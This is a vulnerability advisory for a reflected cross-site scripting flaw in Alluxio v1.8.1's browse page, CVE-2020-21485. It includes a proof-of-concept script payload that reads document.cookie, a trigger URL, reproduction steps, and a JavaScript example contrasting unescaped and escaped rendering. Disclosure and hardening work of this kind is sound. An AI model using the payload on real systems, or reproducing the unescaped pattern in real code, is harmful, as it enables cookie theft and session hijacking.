
CVE-2020-21485: Alluxio v1.8.1 reflected xss vulnerability · Issue #10552 · Alluxio/alluxio

Cross Site Scripting vulnerability in Alluxio v.1.8.1 allows a remote attacker to execute arbitrary code via the path parameter in the browse board component.


A reflected XSS vulnerability was found in Alluxio V1.8.1.

An attacker can inject arbitrary web script or HTML through the “path” parameter in the Browse board, causing a reflected XSS attack and stealing cookies.

POC:
msgbox(“foo”)";</script><script>alert(document.cookie)</script><script>

Vulnerability trigger point:
http://localhost/browse?path=%2F&offset=0&limit=9
The XSS vulnerability will be successfully triggered when an attacker writes the POC in the “path” parameter of the URL.

Process:

1. Select browse and write POC in the “path” parameter
2. Trigger XSS vulnerability
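
The POC's shape (a closing quote, then `</script>`) suggests the "path" value is reflected inside a JavaScript string in an inline script block. The following is an added example, not Alluxio code or the project's fix: it assumes that reflection context and shows the unescaped rendering beside an escaped one, plus an input check. The function names and the `currentDir` variable are hypothetical.

```javascript
// Added example: hypothetical render helpers, not taken from Alluxio.
// Assumption: the browse page writes the "path" query value into a
// double-quoted JavaScript string inside an inline <script> element.

// Vulnerable form: raw concatenation lets a `"` end the string literal
// and a `</script>` end the enclosing element.
function renderUnsafe(path) {
  return '<script>var currentDir = "' + path + '";</script>';
}

// Encode every character that can terminate the string literal or the
// <script> element as \uXXXX, so neither the HTML parser nor the JS
// parser sees a quote, backslash, `<`, `>`, `&` or a line terminator.
function escapeForJsString(value) {
  return String(value).replace(
    /[\\"'<>&\u2028\u2029\u0000-\u001f]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// Hardened form: same template, value passed through the encoder.
function renderSafe(path) {
  return '<script>var currentDir = "' + escapeForJsString(path) + '";</script>';
}

// Defence in depth: reject values that cannot be a browse path at all
// (must be absolute, no markup, quote or control characters).
function isPlausiblePath(path) {
  return typeof path === 'string' &&
    path.startsWith('/') &&
    !/[<>"'`\u0000-\u001f]/.test(path);
}
```

The encoder is specific to the JavaScript-string context; a value reflected into HTML text or an attribute needs HTML entity encoding instead.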

Related news

GHSA-298m-hvgh-x9cw: Alluxio Cross Site Scripting vulnerability

